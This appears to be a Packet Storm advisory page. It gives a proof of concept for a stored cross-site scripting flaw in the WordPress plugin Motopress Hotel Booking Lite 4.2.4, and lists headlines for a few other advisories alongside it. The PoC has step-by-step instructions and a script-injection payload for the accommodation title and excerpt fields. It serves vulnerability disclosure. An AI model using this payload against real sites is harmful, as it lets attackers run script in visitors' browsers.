ABB Cylon Aspect 3.08.01 persistenceManagerAjax.php Directory Traversal

Palo Alto Networks GlobalProtect Local Privilege Escalation

Wireshark Analyzer 4.4.1

Ubuntu Security Notice USN-7061-1

Ubuntu Security Notice USN-7022-3

WordPress Motopress Hotel Booking Lite plugin version 4.2.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)# Date: 2022-06-05# Exploit Author: Sanjay Singh# Vendor Homepage: https://motopress.com/# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip# Version: 4.2.4# Tested on: Windows/XAMPP###########################################################################PoC:1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type2. Click on "Add Accommodation Type".3. Add title payload= "><script>alert("XSS")</script>4. Excerpt input payload "><script>alert("XSS")</script>5. Click publish.6. Visit http://localhost/accommodations/7. XSS payload execute.

Headline

WordPress Motopress Hotel Booking Lite 4.2.4 Cross Site Scripting

Packet Storm: Latest News